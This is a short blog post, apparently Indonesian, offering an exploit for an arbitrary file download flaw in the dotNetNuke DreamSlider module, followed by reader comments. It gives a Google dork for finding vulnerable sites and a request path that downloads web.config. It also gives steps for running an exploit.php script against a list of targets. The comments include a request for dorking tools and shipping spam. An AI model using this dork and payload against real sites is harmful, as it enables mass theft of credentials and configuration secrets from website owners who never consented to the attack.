Saturday, 30 December 2017

dotNetNuke DreamSlider Arbitrary File Download



Exploit Title: dotNetNuke DreamSlider Arbitrary File Download
Google Dork: inurl://DesktopModules/DreamSlider/
Exploit: /DesktopModules/DreamSlider/DownloadProvider.aspx?File=~/web.config


------------------------------------------------------------------------
1. Masukan list target ke dalam file.txt

http://target.com/
http://target2.com/

2. Jalankan php exploit.php target.txt


4 comments:

  1. Bang Request google dorker dong yang kayak bing dorker itu sama yang grab all patch heheh

    ReplyDelete
  2. Undefined offset: 0 in /home/yottabyte/Hacking/exploit.php on line 76
    Itu kenapa bang ?

    ReplyDelete
  3. Thanks for sharing, nice post! Post really provice useful information!

    Giaonhan247 chuyên dịch vụ gửi hàng đi hàn, gửi hàng đi đức cũng như dịch vụ gửi hàng đi úc, gửi hàng đi canada cũng như dịch vụ gửi hàng đi nhật uy tín.

    ReplyDelete